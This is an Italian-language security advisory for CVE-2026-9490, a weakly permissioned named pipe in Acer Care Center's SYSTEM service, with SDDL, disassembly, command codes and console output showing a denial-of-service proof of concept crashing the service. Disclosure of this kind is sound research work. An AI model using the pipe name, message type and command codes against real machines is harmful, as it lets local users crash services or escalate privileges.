CVE ID: CVE-2026-9490
Ricercatore: Vo Duc Thang (ugvxb)
Riconoscimento: https://community.acer.com/en/kb/articles/19668
1. Sommario Esecutivo
È stata identificata una vulnerabilità di sicurezza critica nel servizio Acer Care Center (ACCSvc.exe). La vulnerabilità consente a qualsiasi utente locale autenticato di mandare in crash il servizio di sistema (Denial of Service) e potenzialmente di elevare i privilegi tramite un'interfaccia Named Pipe debolmente protetta.
Il servizio, che viene eseguito con privilegi SYSTEM (LocalSystem), espone una Named Pipe con controlli di accesso eccessivamente permissivi che concedono a tutti gli Utenti Autenticati i permessi di lettura, scrittura ed esecuzione.
2. Dettagli della Vulnerabilità
2.1 Componente Interessata
| Attributo | Valore |
|---|
| Prodotto | Acer Care Center |
| Componente | ACCSvc.exe (Servizio ACC) |
| Nome del servizio | ACCSvc |
| Percorso di installazione | C:\Program Files (x86)\Acer\Care Center\ |
| Account del servizio | LocalSystem (NT AUTHORITY\SYSTEM) |
| Tipo di avvio | AUTO_START |
| Named Pipe | \.\pipe\treadstone_service_LightMode |
2.2 Vulnerabilità #1: Denial of Service
Descrizione
Il servizio ACCSvc crea una Named Pipe con un Security Descriptor debole che consente a qualsiasi utente autenticato di connettersi e inviare messaggi. Quando un messaggio appositamente modificato (tipo di messaggio 0x03) viene inviato alla pipe, il servizio va in crash con codice di uscita 1067 (ERROR_PROCESS_ABORTED).
Descrittore di Sicurezza (SDDL)
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
Analisi SDDL
Impatto
Un utente standard senza privilegi speciali può terminare il servizio di sistema ACCSvc, rendendo non disponibile la funzionalità di Acer Care Center.
2.3 Vulnerabilità #2: Potenziale Escalation Locale dei Privilegi
Descrizione
La stessa ACL debole della Named Pipe consente agli utenti autenticati di inviare messaggi di comando che inducono il servizio a eseguire applicazioni launcher tramite CreateProcessAsUserW.
Codici di Comando
| Comando | Valore Hex | Eseguibile di destinazione |
|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
3. Analisi Tecnica
3.1 Analisi del Binario
| Attributo | Valore |
|---|
| File | ACCSvc.exe |
| Tipo | PE32+ executable (console) x86-64 |
| Strumento di analisi | Radare2 |
3.2 Funzioni Chiave Identificate
3.3 Parametri di Creazione della Named Pipe
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
3.4 Logica di Dispatch dei Comandi
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
4. Risultati dello Sfruttamento
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Risultato: Un utente standard è riuscito a mandare in crash il servizio SYSTEM!
5. Valutazione del Rischio
5.1 Punteggio CVSS v4.0
| Metrica | Valore |
|---|
| Vettore CVSS 4.0 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| Punteggio Base CVSS | 6.8 (Medio) |
5.2 Classificazioni CWE
| ID CWE | Nome |
|---|
| CWE-269 | Gestione Impropria dei Privilegi |
6. Disclaimer
Questa PoC è solo a scopo educativo e di ricerca sulla sicurezza autorizzata. L'autore non è responsabile per qualsiasi uso improprio. Lo sfruttamento senza autorizzazione è illegale.